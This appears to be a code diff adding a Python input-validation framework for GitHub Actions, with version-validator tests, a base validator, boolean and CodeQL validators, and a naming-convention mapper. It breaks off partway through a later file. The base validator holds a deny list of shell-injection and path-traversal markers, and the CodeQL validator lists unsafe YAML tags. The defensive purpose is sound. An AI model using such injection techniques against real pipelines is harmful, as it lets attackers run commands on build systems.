"""Test Node.js version validation with keywords."""
keywords = [
"latest",
"lts",
"current",
"node",
"lts/hydrogen",
"lts/gallium",
"LTS", # Case insensitive
"LATEST",
]
for keyword in keywords:
self.validator.errors = []
result = self.validator.validate_node_version(keyword)
assert result is True, f"Should accept Node keyword: {keyword}"
def test_validate_node_version_invalid(self):
"""Test Node.js version validation with invalid versions."""
invalid_versions = [
"18.0.0.0", # Too many parts
"abc", # Non-numeric
]
for version in invalid_versions:
self.validator.errors = []
result = self.validator.validate_node_version(version)
assert result is False, f"Should reject Node version: {version}"
def test_validate_node_version_empty(self):
"""Test Node.js version allows empty (optional)."""
result = self.validator.validate_node_version("")
assert result is True
def test_calver_leap_year_validation(self):
"""Test CalVer validation with leap year dates."""
# 2024 is a leap year
self.validator.errors = []
assert self.validator.validate_calver("2024.2.29") is True
# 2023 is not a leap year
self.validator.errors = []
assert self.validator.validate_calver("2023.2.29") is False
assert len(self.validator.errors) > 0
# 2000 was a leap year (divisible by 400)
self.validator.errors = []
assert self.validator.validate_calver("2000.2.29") is True
# 1900 was not a leap year (divisible by 100 but not 400)
self.validator.errors = []
assert self.validator.validate_calver("1900.2.29") is False
def test_calver_month_boundaries(self):
"""Test CalVer validation with month boundaries."""
# 30-day months
thirty_day_months = [4, 6, 9, 11]
for month in thirty_day_months:
self.validator.errors = []
assert self.validator.validate_calver(f"2024.{month}.30") is True
self.validator.errors = []
assert self.validator.validate_calver(f"2024.{month}.31") is False
# 31-day months
thirty_one_day_months = [1, 3, 5, 7, 8, 10, 12]
for month in thirty_one_day_months:
self.validator.errors = []
assert self.validator.validate_calver(f"2024.{month}.31") is True
def test_validate_flexible_version_with_latest(self):
"""Test flexible version accepts 'latest' keyword."""
self.validator.errors = []
result = self.validator.validate_flexible_version("latest")
assert result is True
assert len(self.validator.errors) == 0
def test_validate_flexible_version_calver_detection(self):
"""Test flexible version correctly detects CalVer vs SemVer."""
# Should detect as CalVer
calver_versions = [
"2024.3.1",
"2024-03-15",
"24.3.1",
]
for version in calver_versions:
self.validator.errors = []
result = self.validator.validate_flexible_version(version)
assert result is True, f"Should accept CalVer: {version}"
# Invalid CalVer should fail (not try SemVer)
self.validator.errors = []
result = self.validator.validate_flexible_version("2024.13.1")
assert result is False
assert "CalVer" in " ".join(self.validator.errors)
def test_validate_inputs_with_different_types(self):
"""Test validate_inputs with different version input types."""
inputs = {
"python-version": "3.10",
"php-version": "8.2",
"go-version": "1.21",
"node-version": "18",
"dotnet-version": "6.0",
"terraform-version": "1.5.7",
"version": "1.2.3",
}
result = self.validator.validate_inputs(inputs)
assert result is True
assert len(self.validator.errors) == 0
def test_validate_inputs_with_invalid_versions(self):
"""Test validate_inputs with invalid versions."""
inputs = {
"python-version": "2.7", # Too old
"php-version": "v8.2", # v prefix not allowed
}
result = self.validator.validate_inputs(inputs)
assert result is False
assert len(self.validator.errors) >= 2
def test_semver_simple_formats(self):
"""Test semantic version with simple formats (X.Y and X)."""
simple_versions = [
"1.0", # X.Y
"2.5", # X.Y
"1", # X
"10", # X
]
for version in simple_versions:
self.validator.errors = []
result = self.validator.validate_semver(version)
assert result is True, f"Should accept simple format: {version}"
def test_semver_with_uppercase_v(self):
"""Test semantic version with uppercase V prefix."""
self.validator.errors = []
result = self.validator.validate_semver("V1.2.3")
assert result is True
assert len(self.validator.errors) == 0
def test_dotnet_leading_zeros_rejection(self):
"""Test .NET version rejects leading zeros."""
invalid_versions = [
"06.0", # Leading zero in major
"6.01", # Leading zero in minor
"6.0.001", # Leading zero in patch
]
for version in invalid_versions:
self.validator.errors = []
result = self.validator.validate_dotnet_version(version)
assert result is False, f"Should reject .NET version with leading zeros: {version}"
def test_get_required_inputs(self):
"""Test get_required_inputs returns empty list."""
required = self.validator.get_required_inputs()
assert isinstance(required, list)
assert len(required) == 0
def test_error_handling_accumulation(self):
"""Test that errors accumulate across validations."""
self.validator.errors = []
self.validator.validate_semver("invalid")
first_error_count = len(self.validator.errors)
self.validator.validate_calver("2024.13.1")
second_error_count = len(self.validator.errors)
assert second_error_count > first_error_count
assert second_error_count >= 2

117
validate-inputs/validator.py Executable file
View File

@@ -0,0 +1,117 @@
#!/usr/bin/env python3
"""GitHub Actions Input Validator.
This module validates inputs for GitHub Actions based on predefined rules.
"""
from __future__ import annotations
import logging
import os
from pathlib import Path
import sys
# Add current directory to path
sys.path.insert(0, str(Path(__file__).parent))
from validators.registry import get_validator # pylint: disable=wrong-import-position
# Configure logging for GitHub Actions
logging.basicConfig(
format="%(message)s",
level=logging.INFO,
)
logger = logging.getLogger(__name__)
def collect_inputs() -> dict[str, str]:
"""Collect all inputs from environment variables.
Returns:
Dictionary of input names to values
"""
inputs = {}
for key, value in os.environ.items():
if key.startswith("INPUT_") and key != "INPUT_ACTION_TYPE":
input_name = key[6:].lower()
inputs[input_name] = value
# Also add dash version for compatibility
if "_" in input_name:
inputs[input_name.replace("_", "-")] = value
return inputs
def write_output(status: str, action_type: str, **kwargs) -> None:
"""Write validation output to GitHub Actions output file.
Args:
status: Status to write (success or failure)
action_type: The action type being validated
**kwargs: Additional key-value pairs to write
"""
output_file = os.environ.get("GITHUB_OUTPUT")
if not output_file:
return # No output file configured
try:
output_path = Path(output_file)
# Try to create parent directory if it doesn't exist
output_path.parent.mkdir(parents=True, exist_ok=True)
with output_path.open("a", encoding="utf-8") as f:
lines = [
f"status={status}\n",
f"action={action_type}\n",
]
lines.extend(f"{key}={value}\n" for key, value in kwargs.items())
f.writelines(lines)
except OSError:
logger.exception("::error::Validation script error: Could not write to output file")
sys.exit(1)
def main() -> None:
"""Main validation entry point."""
# Get the action type from environment
action_type = os.environ.get("INPUT_ACTION_TYPE", "").strip()
if not action_type:
logger.error("::error::No action type provided")
sys.exit(1)
# Convert to standard format (replace dashes with underscores)
action_type = action_type.replace("-", "_")
# Get validator from registry
# This will either load custom validator or fall back to convention-based
validator = get_validator(action_type)
# Collect all inputs
inputs = collect_inputs()
# Validate inputs
logger.debug("::debug::Validating %d inputs for %s", len(inputs), action_type)
if validator.validate_inputs(inputs):
# Only show success message if not in quiet mode (for tests)
if not os.environ.get("VALIDATOR_QUIET"):
logger.info("✓ All input validation checks passed for %s", action_type)
write_output("success", action_type, inputs_validated=len(inputs))
else:
# Report errors (suppress if in quiet mode for tests)
if not os.environ.get("VALIDATOR_QUIET"):
for error in validator.errors:
logger.error("::error::%s", error)
logger.error("✗ Input validation failed for %s", action_type)
write_output(
"failure",
action_type,
error="; ".join(validator.errors),
errors=len(validator.errors),
)
sys.exit(1)
if __name__ == "__main__":
main()

10
validate-inputs/validators/__init__.py Normal file
View File

@@ -0,0 +1,10 @@
"""Modular validation system for GitHub Actions inputs.
This package provides a flexible, extensible validation framework for GitHub Actions.
"""
from .base import BaseValidator
from .registry import ValidatorRegistry
__all__ = ["BaseValidator", "ValidatorRegistry"]
__version__ = "2.0.0"

229
validate-inputs/validators/base.py Normal file
View File

@@ -0,0 +1,229 @@
"""Base validator class for GitHub Actions input validation.
Provides the foundation for all validators with common functionality.
"""
from __future__ import annotations
from abc import ABC, abstractmethod
from pathlib import Path
from typing import Any
class BaseValidator(ABC):
"""Abstract base class for all validators.
Provides common validation interface and error handling.
"""
def __init__(self, action_type: str = "") -> None:
"""Initialize the base validator.
Args:
action_type: The type of GitHub Action being validated
"""
self.action_type = action_type
self.errors: list[str] = []
self._rules: dict[str, Any] = {}
def add_error(self, message: str) -> None:
"""Add a validation error message.
Args:
message: The error message to add
"""
self.errors.append(message)
def clear_errors(self) -> None:
"""Clear all validation errors."""
self.errors = []
def has_errors(self) -> bool:
"""Check if there are any validation errors.
Returns:
True if there are errors, False otherwise
"""
return len(self.errors) > 0
@abstractmethod
def validate_inputs(self, inputs: dict[str, str]) -> bool:
"""Validate the provided inputs.
Args:
inputs: Dictionary of input names to values
Returns:
True if all inputs are valid, False otherwise
"""
@abstractmethod
def get_required_inputs(self) -> list[str]:
"""Get the list of required input names.
Returns:
List of required input names
"""
@abstractmethod
def get_validation_rules(self) -> dict[str, Any]:
"""Get the validation rules for this validator.
Returns:
Dictionary of validation rules
"""
def validate_required_inputs(self, inputs: dict[str, str]) -> bool:
"""Validate that all required inputs are present and non-empty.
Args:
inputs: Dictionary of input names to values
Returns:
True if all required inputs are present, False otherwise
"""
valid = True
required = self.get_required_inputs()
for req_input in required:
if not inputs.get(req_input, "").strip():
self.add_error(f"Required input '{req_input}' is missing or empty")
valid = False
return valid
def validate_security_patterns(self, value: str, name: str = "input") -> bool:
"""Check for common security injection patterns.
Args:
value: The value to check
name: The name of the input for error messages
Returns:
True if no injection patterns found, False otherwise
"""
if not value or value.strip() == "":
return True
# Common injection patterns to check
dangerous_patterns = [
(";", "command separator"),
("&&", "command chaining"),
("||", "command chaining"),
("|", "pipe operator"),
("`", "command substitution"),
("$(", "command substitution"),
("${", "variable expansion"),
("../", "path traversal"),
("..\\", "path traversal"),
]
for pattern, description in dangerous_patterns:
if pattern in value:
self.add_error(
f"Potential security issue in {name}: contains {description} '{pattern}'",
)
return False
return True
def validate_path_security(self, path: str, name: str = "path") -> bool:
"""Validate file paths for security issues.
Args:
path: The file path to validate
name: The name of the input for error messages
Returns:
True if path is secure, False otherwise
"""
if not path or path.strip() == "":
return True
# Check for absolute paths
if path.startswith("/") or (len(path) > 1 and path[1] == ":"):
self.add_error(f"Invalid {name}: '{path}'. Absolute path not allowed")
return False
# Check for path traversal
if ".." in path:
self.add_error(f"Invalid {name}: '{path}'. Path traversal detected")
return False
# Check for home directory expansion
if path.startswith("~"):
self.add_error(f"Invalid {name}: '{path}'. Home directory expansion not allowed")
return False
return True
def validate_empty_allowed(self, value: str, name: str) -> bool:
"""Validate that a value is provided (not empty).
Args:
value: The value to check
name: The name of the input for error messages
Returns:
True if value is not empty, False otherwise
"""
if not value or value.strip() == "":
self.add_error(f"Input '{name}' cannot be empty")
return False
return True
def load_rules(self, rules_path: Path | None = None) -> dict[str, Any]:
"""Load validation rules from YAML file.
Args:
rules_path: Path to the rules YAML file (must be a Path object)
Returns:
Dictionary containing validation rules
"""
if not rules_path:
# Default to action folder's rules.yml file
action_dir = Path(__file__).parent.parent.parent / self.action_type.replace("_", "-")
rules_path = action_dir / "rules.yml"
# Ensure rules_path is a Path object
if not isinstance(rules_path, Path):
msg = f"rules_path must be a Path object, got {type(rules_path)}"
raise TypeError(msg)
if not rules_path.exists():
return {}
try:
import yaml # pylint: disable=import-error,import-outside-toplevel
with rules_path.open(encoding="utf-8") as f:
self._rules = yaml.safe_load(f) or {}
return self._rules
except Exception as e: # pylint: disable=broad-exception-caught
self.add_error(f"Failed to load rules from {rules_path}: {e}")
return {}
def get_github_actions_output(self) -> dict[str, str]:
"""Get output formatted for GitHub Actions.
Returns:
Dictionary with status and error keys for GitHub Actions
"""
if self.has_errors():
return {
"status": "failure",
"error": "; ".join(self.errors),
}
return {
"status": "success",
"error": "",
}
def is_github_expression(self, value: str) -> bool:
"""Check if the value is a GitHub expression."""
return (
value.lower() == "${{ github.token }}"
or ("${{" in value and "}}" in value)
or (value.strip().startswith("${{") and value.strip().endswith("}}"))
)

174
validate-inputs/validators/boolean.py Normal file
View File

@@ -0,0 +1,174 @@
"""Boolean validator for true/false inputs."""
from __future__ import annotations
from .base import BaseValidator
class BooleanValidator(BaseValidator):
"""Validator for boolean inputs."""
def validate_inputs(self, inputs: dict[str, str]) -> bool:
"""Validate boolean inputs."""
valid = True
# Common boolean input patterns
boolean_keywords = [
"dry-run",
"dry_run",
"verbose",
"debug",
"fail-on-error",
"fail_on_error",
"cache",
"skip",
"force",
"auto",
"enabled",
"disabled",
"check-only",
"check_only",
"sign",
"scan",
"push",
"nightly",
"stable",
"provenance",
"sbom",
]
for input_name, value in inputs.items():
# Check if input name suggests boolean
is_boolean_input = any(keyword in input_name.lower() for keyword in boolean_keywords)
# Also check for specific patterns
if (
is_boolean_input
or input_name.startswith(
(
"is-",
"is_",
"has-",
"has_",
"enable-",
"enable_",
"disable-",
"disable_",
"use-",
"use_",
"with-",
"with_",
"without-",
"without_",
),
)
or input_name.endswith(("-enabled", "_enabled", "-disabled", "_disabled"))
):
valid &= self.validate_boolean(value, input_name)
return valid
def get_required_inputs(self) -> list[str]:
"""Boolean validators typically don't define required inputs."""
return []
def get_validation_rules(self) -> dict:
"""Return boolean validation rules."""
return {
"boolean": "Must be 'true' or 'false' (lowercase)",
}
def validate_boolean(self, value: str, name: str = "boolean") -> bool:
"""Validate boolean input.
Args:
value: The value to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
# Empty boolean often defaults to false
return True
# Allow GitHub Actions expressions
if self.is_github_expression(value):
return True
# Accept any case variation of true/false
if value.lower() in ["true", "false"]:
return True
# Check for yes/no (not valid for GitHub Actions)
if value.lower() in ["yes", "no", "y", "n"]:
self.add_error(
f"Invalid {name}: \"{value}\". Must be 'true' or 'false'",
)
return False
# Check for numeric boolean
if value in ["0", "1"]:
self.add_error(
f"Invalid {name}: \"{value}\". Must be 'true' or 'false'",
)
return False
# Generic error
self.add_error(f"Invalid {name}: \"{value}\". Must be 'true' or 'false'")
return False
def validate_boolean_extended(self, value: str | None, name: str = "boolean") -> bool:
"""Validate boolean input with extended options (true/false/empty).
Args:
value: The value to validate
name: The input name for error messages
Returns:
True if valid or empty, False otherwise
"""
if value is None:
return True
if not value or value.strip() == "":
return True
if value.lower() in ["yes", "no", "y", "n", "0", "1", "on", "off"]:
return True
return self.validate_boolean(value, name)
def validate_optional_boolean(self, value: str | None, name: str = "boolean") -> bool:
"""Validate optional boolean input (can be empty).
Args:
value: The value to validate
name: The input name for error messages
Returns:
True if valid or empty, False otherwise
"""
if value is None:
return True
if not value or value.strip() == "":
return True
return self.validate_boolean(value, name)
def validate_required_boolean(self, value: str, name: str = "boolean") -> bool:
"""Validate required boolean input (cannot be empty).
Args:
value: The value to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
self.add_error(f"Boolean {name} cannot be empty")
return False
return self.validate_boolean(value, name)

308
validate-inputs/validators/codeql.py Normal file
View File

@@ -0,0 +1,308 @@
"""CodeQL-specific validators for code analysis actions."""
from __future__ import annotations
import re
from typing import ClassVar
from .base import BaseValidator
class CodeQLValidator(BaseValidator):
"""Validator for CodeQL analysis action inputs."""
# Supported CodeQL languages
SUPPORTED_LANGUAGES: ClassVar[set[str]] = {
"javascript",
"typescript",
"python",
"java",
"csharp",
"cpp",
"c",
"go",
"ruby",
"swift",
"kotlin",
"actions",
}
# Standard query suites
STANDARD_SUITES: ClassVar[set[str]] = {
"security-extended",
"security-and-quality",
"code-scanning",
"default",
}
# Valid build modes
BUILD_MODES: ClassVar[set[str]] = {"none", "manual", "autobuild"}
def validate_inputs(self, inputs: dict[str, str]) -> bool:
"""Validate CodeQL-specific inputs."""
valid = True
for input_name, value in inputs.items():
if input_name == "language":
valid &= self.validate_codeql_language(value)
elif input_name == "queries":
valid &= self.validate_codeql_queries(value)
elif input_name == "packs":
valid &= self.validate_codeql_packs(value)
elif input_name in {"build-mode", "build_mode"}:
valid &= self.validate_codeql_build_mode(value)
elif input_name == "config":
valid &= self.validate_codeql_config(value)
elif input_name == "category":
valid &= self.validate_category_format(value)
elif input_name == "threads":
valid &= self.validate_threads(value)
elif input_name == "ram":
valid &= self.validate_ram(value)
return valid
def get_required_inputs(self) -> list[str]:
"""Get required inputs for CodeQL analysis."""
return ["language"] # Language is required for CodeQL
def get_validation_rules(self) -> dict:
"""Return CodeQL validation rules."""
return {
"language": list(self.SUPPORTED_LANGUAGES),
"queries": list(self.STANDARD_SUITES),
"build_modes": list(self.BUILD_MODES),
"threads": "1-128",
"ram": "256-32768 MB",
}
def validate_codeql_language(self, value: str) -> bool:
"""Validate CodeQL language.
Args:
value: The language to validate
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
self.add_error("CodeQL language cannot be empty")
return False
language = value.strip().lower()
if language in self.SUPPORTED_LANGUAGES:
return True
self.add_error(
f'Invalid CodeQL language: "{value}". '
f"Supported languages: {', '.join(sorted(self.SUPPORTED_LANGUAGES))}",
)
return False
def validate_codeql_queries(self, value: str) -> bool:
"""Validate CodeQL query suites.
Args:
value: The queries to validate
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
self.add_error("CodeQL queries cannot be empty")
return False
# Allow GitHub Actions expressions
if self.is_github_expression(value):
return True
# Split by comma and validate each query
queries = [q.strip() for q in value.split(",") if q.strip()]
for query in queries:
query_lower = query.lower()
# Check if it's a standard suite
if query_lower in self.STANDARD_SUITES:
continue
# Check if it's a query file path
if query.endswith((".ql", ".qls")):
# Validate as file path
if not self.validate_path_security(query, "query file"):
return False
continue
# Check if it contains path separators (custom query path)
if "/" in query or "\\" in query:
if not self.validate_path_security(query, "query path"):
return False
continue
# If none of the above, it's invalid
self.add_error(f'Invalid CodeQL query suite: "{query}"')
return False
return True
def validate_codeql_packs(self, value: str) -> bool:
"""Validate CodeQL query packs.
Args:
value: The packs to validate
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
return True # Packs are optional
# Split by comma and validate each pack
packs = [p.strip() for p in value.split(",") if p.strip()]
# Pack format: pack-name or owner/repo or owner/repo@version
pack_pattern = r"^[a-zA-Z0-9._/-]+(@[a-zA-Z0-9._-]+)?$"
for pack in packs:
if not re.match(pack_pattern, pack):
self.add_error(
f'Invalid CodeQL pack format: "{pack}". '
"Expected format: pack-name, owner/repo, or owner/repo@version",
)
return False
return True
def validate_codeql_build_mode(self, value: str) -> bool:
"""Validate CodeQL build mode.
Args:
value: The build mode to validate
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
return True # Build mode is optional
mode = value.strip().lower()
if mode in self.BUILD_MODES:
return True
self.add_error(
f'Invalid CodeQL build mode: "{value}". '
f"Valid options: {', '.join(sorted(self.BUILD_MODES))}",
)
return False
def validate_codeql_config(self, value: str) -> bool:
"""Validate CodeQL configuration.
Args:
value: The config to validate
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
return True # Config is optional
# Check for dangerous YAML patterns
dangerous_patterns = [
r"!!python/", # Python object execution
r"!!ruby/", # Ruby execution
r"!!perl/", # Perl execution
r"!!js/", # JavaScript execution
]
for pattern in dangerous_patterns:
if re.search(pattern, value, re.IGNORECASE):
self.add_error(f"Dangerous pattern in CodeQL config: {pattern}")
return False
return True
def validate_category_format(self, value: str) -> bool:
"""Validate analysis category format.
Args:
value: The category to validate
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
return True # Category is optional
# Allow GitHub Actions expressions
if self.is_github_expression(value):
return True
# Category should start with /
if not value.startswith("/"):
self.add_error(f'Category must start with "/": {value}')
return False
# Check for valid characters
if not re.match(r"^/[a-zA-Z0-9_:/-]+$", value):
self.add_error(f"Invalid category format: {value}")
return False
return True
def validate_threads(self, value: str, name: str = "threads") -> bool:
"""Validate thread count (1-128).
Args:
value: The thread count to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
return True # Optional
try:
threads = int(value.strip())
if 1 <= threads <= 128:
return True
self.add_error(f"Invalid {name}: {threads}. Must be between 1 and 128")
return False
except ValueError:
self.add_error(f'Invalid {name}: "{value}". Must be a number')
return False
def validate_ram(self, value: str, name: str = "ram") -> bool:
"""Validate RAM in MB (256-32768).
Args:
value: The RAM value to validate
name: The input name for error messages
Returns:
True if valid, False otherwise
"""
if not value or value.strip() == "":
return True # Optional
try:
ram = int(value.strip())
if 256 <= ram <= 32768:
return True
self.add_error(f"Invalid {name}: {ram}. Must be between 256 and 32768 MB")
return False
except ValueError:
self.add_error(f'Invalid {name}: "{value}". Must be a number')
return False
# Convenience methods for convention-based validation
def validate_numeric_range_1_128(self, value: str, name: str = "threads") -> bool:
"""Alias for thread validation."""
return self.validate_threads(value, name)
def validate_numeric_range_256_32768(self, value: str, name: str = "ram") -> bool:
"""Alias for RAM validation."""
return self.validate_ram(value, name)

345
validate-inputs/validators/convention_mapper.py Normal file
View File

@@ -0,0 +1,345 @@
"""Convention mapper for automatic validation detection.
Maps input names to appropriate validators based on naming conventions.
"""
from __future__ import annotations
from typing import TYPE_CHECKING, Any, ClassVar
if TYPE_CHECKING:
from collections.abc import Callable
class ConventionMapper:
"""Maps input names to validators based on naming conventions."""
# Priority-ordered convention patterns
CONVENTION_PATTERNS: ClassVar[list[dict[str, Any]]] = [
# High priority - exact matches
{
"priority": 100,
"type": "exact",
"patterns": {
"email": "email",
"url": "url",
"username": "username",
"password": "password",
"token": "github_token",
"github-token": "github_token",
"npm-token": "npm_token",
"docker-token": "docker_token",
"dockerhub-token": "docker_token",
"registry-token": "registry_token",
"api-key": "api_key",
"secret": "secret",
},
},
# Version patterns - specific versions have higher priority
{
"priority": 96, # Highest priority for exact version match
"type": "exact",
"patterns": {
"version": "flexible_version", # Support both SemVer and CalVer
},
},
{
"priority": 95, # Higher priority for specific versions
"type": "contains",
"patterns": {
"python-version": "python_version",
"node-version": "node_version",
"go-version": "go_version",
"php-version": "php_version",
"dotnet-version": "dotnet_version",
"terraform-version": "terraform_version",
"java-version": "java_version",
"ruby-version": "ruby_version",
},
},
{
"priority": 90, # Lower priority for generic version
"type": "suffix",
"patterns": {
"-version": "version",
"_version": "version",
},
},
# Boolean patterns
{
"priority": 80,
"type": "exact",
"patterns": {
"dry-run": "boolean",
"draft": "boolean",
"prerelease": "boolean",
"push": "boolean",
"force": "boolean",
"skip": "boolean",
"enabled": "boolean",
"disabled": "boolean",
"verbose": "boolean",
"debug": "boolean",
"nightly": "boolean",
"stable": "boolean",
"provenance": "boolean",
"sbom": "boolean",
"sign": "boolean",
"scan": "boolean",
},
},
{
"priority": 80,
"type": "prefix",
"patterns": {
"is-": "boolean",
"is_": "boolean",
"has-": "boolean",
"has_": "boolean",
"enable-": "boolean",
"enable_": "boolean",
"disable-": "boolean",
"disable_": "boolean",
"use-": "boolean",
"use_": "boolean",
"with-": "boolean",
"with_": "boolean",
"without-": "boolean",
"without_": "boolean",
},
},
{
"priority": 80,
"type": "suffix",
"patterns": {
"-enabled": "boolean",
"_enabled": "boolean",
"-disabled": "boolean",
"_disabled": "boolean",
},
},
# File patterns
{
"priority": 70,
"type": "suffix",
"patterns": {
"-file": "file_path",
"_file": "file_path",
"-path": "file_path",
"_path": "file_path",
"-dir": "directory",
"_dir": "directory",
"-directory": "directory",
"_directory": "directory",
},
},
{
"priority": 70,
"type": "exact",
"patterns": {
"dockerfile": "dockerfile",
"config": "file_path",
"config-file": "file_path",
"env-file": "env_file",
"compose-file": "compose_file",
},
},
# Numeric patterns
{
"priority": 60,
"type": "exact",
"patterns": {
"retries": "numeric_1_10",
"max-retries": "numeric_1_10",
"attempts": "numeric_1_10",
"timeout": "timeout",
"timeout-ms": "timeout_ms",
"timeout-seconds": "timeout",
"threads": "numeric_1_128",
"workers": "numeric_1_128",
"concurrency": "numeric_1_128",
"parallel-builds": "numeric_0_16",
"max-parallel": "numeric_0_16",
"compression-quality": "numeric_0_100",
"jpeg-quality": "numeric_0_100",
"quality": "numeric_0_100",
"max-warnings": "numeric_0_10000",
"days-before-stale": "positive_integer",
"days-before-close": "positive_integer",
"port": "port",
"ram": "numeric_256_32768",
"memory": "numeric_256_32768",
},
},
# Docker patterns
{
"priority": 50,
"type": "exact",
"patterns": {
"image": "docker_image",
"image-name": "docker_image",
"tag": "docker_tag",
"tags": "docker_tags",
"platforms": "docker_architectures",
"architectures": "docker_architectures",
"registry": "docker_registry",
"namespace": "docker_namespace",
"prefix": "prefix",
"suffix": "suffix",
"cache-from": "cache_mode",
"cache-to": "cache_mode",
"build-args": "build_args",
"labels": "labels",
},
},
# Network patterns
{
"priority": 40,
"type": "suffix",
"patterns": {
"-url": "url",
"_url": "url",
"-endpoint": "url",
"_endpoint": "url",
"-webhook": "url",
"_webhook": "url",
},
},
{
"priority": 40,
"type": "exact",
"patterns": {
"hostname": "hostname",
"host": "hostname",
"server": "hostname",
"domain": "hostname",
"ip": "ip_address",
"ip-address": "ip_address",
},
},
]
def __init__(self) -> None:
"""Initialize the convention mapper."""
self._cache = {}
self._compile_patterns()
def _compile_patterns(self) -> None:
"""Compile patterns for efficient matching."""
# Sort patterns by priority
self.CONVENTION_PATTERNS.sort(key=lambda x: x["priority"], reverse=True)
def _normalize_pattern(
self, normalized: str, pattern_type: str, patterns: dict[str, str]
) -> str | None:
result = None # Initialize to None for cases where no pattern matches
if pattern_type == "exact" and normalized in patterns:
result = patterns[normalized]
elif pattern_type == "prefix":
for prefix, validator in patterns.items():
if normalized.startswith(prefix):
result = validator
break
elif pattern_type == "suffix":
for suffix, validator in patterns.items():
if normalized.endswith(suffix):
result = validator
break
elif pattern_type == "contains":
for substring, validator in patterns.items():
if substring in normalized:
result = validator
break
return result
def get_validator_type(
self,
input_name: str,
input_config: dict[str, Any] | None = None,
) -> str | None:
"""Get the validator type for an input based on conventions.
Args:
input_name: The name of the input
input_config: Optional configuration for the input
Returns:
The validator type or None if no convention matches
"""
# Check cache
cache_key = f"{input_name}:{input_config!s}"
if cache_key in self._cache:
return self._cache[cache_key]
result = None
# Check for explicit validator in config
if input_config and isinstance(input_config, dict):
if "validator" in input_config:
result = input_config["validator"]
elif "type" in input_config:
result = input_config["type"]
# If no explicit validator, try pattern matching
if result is None:
# Normalize input name for matching
normalized = input_name.lower().replace("_", "-")
# Try each pattern group in priority order
for pattern_group in self.CONVENTION_PATTERNS:
if result is not None:
break
pattern_type = pattern_group["type"]
patterns = pattern_group["patterns"]
result = self._normalize_pattern(normalized, pattern_type, patterns)
# Cache and return result
self._cache[cache_key] = result
return result
def get_validator_for_inputs(self, inputs: dict[str, Any]) -> dict[str, str]:
"""Get validators for all inputs based on conventions.
Args:
inputs: Dictionary of input names and values
Returns:
Dictionary mapping input names to validator types
"""
validators = {}
for input_name in inputs:
validator_type = self.get_validator_type(input_name)
if validator_type:
validators[input_name] = validator_type
return validators
def clear_cache(self) -> None:
"""Clear the validator cache."""
self._cache = {}
def add_custom_pattern(self, pattern: dict[str, Any]) -> None:
"""Add a custom pattern to the convention mapper.
Args:
pattern: Pattern dictionary with priority, type, and patterns
"""
# Note: Modifying ClassVar directly is not ideal, but needed for dynamic configuration
ConventionMapper.CONVENTION_PATTERNS.append(pattern)
self._compile_patterns()
self.clear_cache()
def remove_pattern(self, pattern_filter: Callable[[dict], bool]) -> None:
"""Remove patterns matching a filter.
Args:
pattern_filter: Function that returns True for patterns to remove
"""
# Note: Modifying ClassVar directly is not ideal, but needed for dynamic configuration
ConventionMapper.CONVENTION_PATTERNS = [
p for p in ConventionMapper.CONVENTION_PATTERNS if not pattern_filter(p)
]
self._compile_patterns()
self.clear_cache()

610
validate-inputs/validators/conventions.py Normal file
View File

@@ -0,0 +1,610 @@
"""Convention-based validator that uses naming patterns to determine validation rules.
This validator automatically applies validation based on input naming conventions.
"""
from __future__ import annotations
from pathlib import Path
from typing import Any
import yaml # pylint: disable=import-error
from .base import BaseValidator
from .convention_mapper import ConventionMapper
TOKEN_TYPES = {
"github": "github_token",
"npm": "npm_token",
"docker": "docker_token",
}
VERSION_MAPPINGS = {
"python": "python_version",
"node": "node_version",
"go": "go_version",
"php": "php_version",
"terraform": "terraform_version",
"dotnet": "dotnet_version",
"net": "dotnet_version",
}
FILE_TYPES = {
"yaml": "yaml_file",
"yml": "yaml_file",
"json": "json_file",
}
class ConventionBasedValidator(BaseValidator):
"""Validator that applies validation based on naming conventions.
Automatically detects validation requirements based on input names
and applies appropriate validators.
"""
def __init__(self, action_type: str) -> None:
"""Initialize the convention-based validator.
Args:
action_type: The type of GitHub Action being validated
"""
super().__init__(action_type)
self._rules = self.load_rules()
self._validator_modules: dict[str, Any] = {}
self._convention_mapper = ConventionMapper() # Use the ConventionMapper
self._load_validator_modules()
def _load_validator_modules(self) -> None:
"""Lazy-load validator modules as needed."""
# These will be imported as needed to avoid circular imports
def load_rules(self, rules_path: Path | None = None) -> dict[str, Any]:
"""Load validation rules from YAML file.
Args:
rules_path: Optional path to the rules YAML file
Returns:
Dictionary of validation rules
"""
if rules_path and rules_path.exists():
rules_file = rules_path
else:
# Find the rules file for this action in the action folder
# Convert underscores back to dashes for the folder name
action_name = self.action_type.replace("_", "-")
project_root = Path(__file__).parent.parent.parent
rules_file = project_root / action_name / "rules.yml"
if not rules_file.exists():
# Return default empty rules if no rules file exists
return {
"action_type": self.action_type,
"required_inputs": [],
"optional_inputs": {},
"conventions": {},
"overrides": {},
}
try:
with Path(rules_file).open() as f:
rules = yaml.safe_load(f) or {}
# Ensure all expected keys exist
rules.setdefault("required_inputs", [])
rules.setdefault("optional_inputs", {})
rules.setdefault("conventions", {})
rules.setdefault("overrides", {})
# Build conventions from optional_inputs if not explicitly set
if not rules["conventions"] and rules["optional_inputs"]:
conventions = {}
for input_name, input_config in rules["optional_inputs"].items():
# Try to infer validator type from the input name or pattern
conventions[input_name] = self._infer_validator_type(input_name, input_config)
rules["conventions"] = conventions
return rules
except Exception:
return {
"action_type": self.action_type,
"required_inputs": [],
"optional_inputs": {},
"conventions": {},
"overrides": {},
}
def _infer_validator_type(self, input_name: str, input_config: dict[str, Any]) -> str | None:
"""Infer the validator type from input name and configuration.
Args:
input_name: The name of the input
input_config: The input configuration from rules
Returns:
The inferred validator type or None
"""
# Check for explicit validator type in config
if isinstance(input_config, dict) and "validator" in input_config:
return input_config["validator"]
# Infer based on name patterns
name_lower = input_name.lower().replace("-", "_")
# Try to determine validator type
validator_type = self._check_exact_matches(name_lower)
if validator_type is None:
validator_type = self._check_pattern_based_matches(name_lower)
return validator_type
def _check_exact_matches(self, name_lower: str) -> str | None:
"""Check for exact pattern matches."""
exact_matches = {
# Docker patterns
